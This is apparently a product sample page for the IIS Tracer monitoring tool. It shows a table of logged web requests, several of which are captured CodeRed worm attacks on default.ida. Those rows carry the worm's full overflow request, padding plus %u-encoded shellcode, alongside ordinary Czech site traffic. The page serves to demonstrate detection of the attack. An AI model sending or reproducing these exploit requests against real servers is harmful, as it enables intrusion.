Interesting captures (CodeRed attack) with IIS Tracer web site monitoring tool

ActiveX/VBSScript registry editor  ActiveX NT User account manager  Export MDB/DBF from ASP
Url replacer, IIS url rewrite Active LogFile  Email export  ActiveX/ASP Scripting Dictionary object
 IISTracer, real-time IIS monitor
 Huge ASP upload - upload files with progress.
Sample page
<< IIS Tracer web site monitoring tool
 CodeRed attack to IIS server   
 
      CodeRed sends data to the default.ida script. Next table shows how can IIS Tracer web site monitoring tool monitor CodeRed activity from another servers to your server.

 Start 
 Time 
 In raw 
 [B] 
 In Content 
 length [B] 
 Out raw
 [B] 
 Out Content 
 length [B] 
 Running 
 [ms] 
 State  Client  URL 
 13:59:13.554 2 358 3 379 483 3 252 614 229  End of request  217.11.239.22  GET http://217.11.235.107/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
 14:03:26.104 3 379 un 543 469  Authentication  217.11.239.22  GET http://217.11.235.103/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
 14:09:54.083 ns 10 698 10 469 14 147  End of request  62.24.71.131  GET http://g.aliaweb.cz/cphistory.obr?LV=1&ID=965&/BLBUNIFO.gif
 14:09:54.821 ns 35 237 34 805 13 088  End of request  195.47.108.147  GET http://zpravodaj.cz/l.asp?LT=ptEkonomika&SF=Ctenost_Celkem
 14:10:01.827 2 358 3 379 483 3 252 36 086  End of request  217.11.239.22  GET http://217.11.235.108/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
 14:10:50.171 2 358 3 379 465 3 252 35 595  End of request  217.11.239.22  GET http://217.11.235.111/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
 14:11:01.048 ns 29 824 29 582 41 655  End of request  212.20.109.156  GET http://r.kde.cz/js/nh.js
 14:11:25.065 ns 13 302 13 074 5 978  End of request  213.175.33.146  GET http://e.kde.cz/ban/zpravodaj/zpr_zelen.gif
 14:11:27.309 ns 28 849 28 624 6 274  End of request  212.20.120.122  GET http://r.kde.cz/ban/exchange/horizont2.gif
 14:11:35.157 ns 29 824 29 582 10 039  End of request  195.144.126.39  GET http://r.kde.cz/js/nh.js
 14:11:47.583 ns 26 672 26 444 9 138  End of request  195.212.204.131  GET http://e.kde.cz/ban/akcie/fio_ban1.gif
 14:11:50.371 ns 28 849 28 624 11 891  End of request  193.165.145.88  GET http://r.kde.cz/ban/exchange/horizont2.gif
 14:12:28.297 ns un 1 275  URL Mapping  194.228.119.18  GET http://www.ariadna.cz/ariadna/getCal.asp?ID=44&head=1&Langver=1&T=MGDRIOC&sort=1&DESC=1

© 1996 – 2007 Antonin Foller, Motobit Software, help@pstruh.cz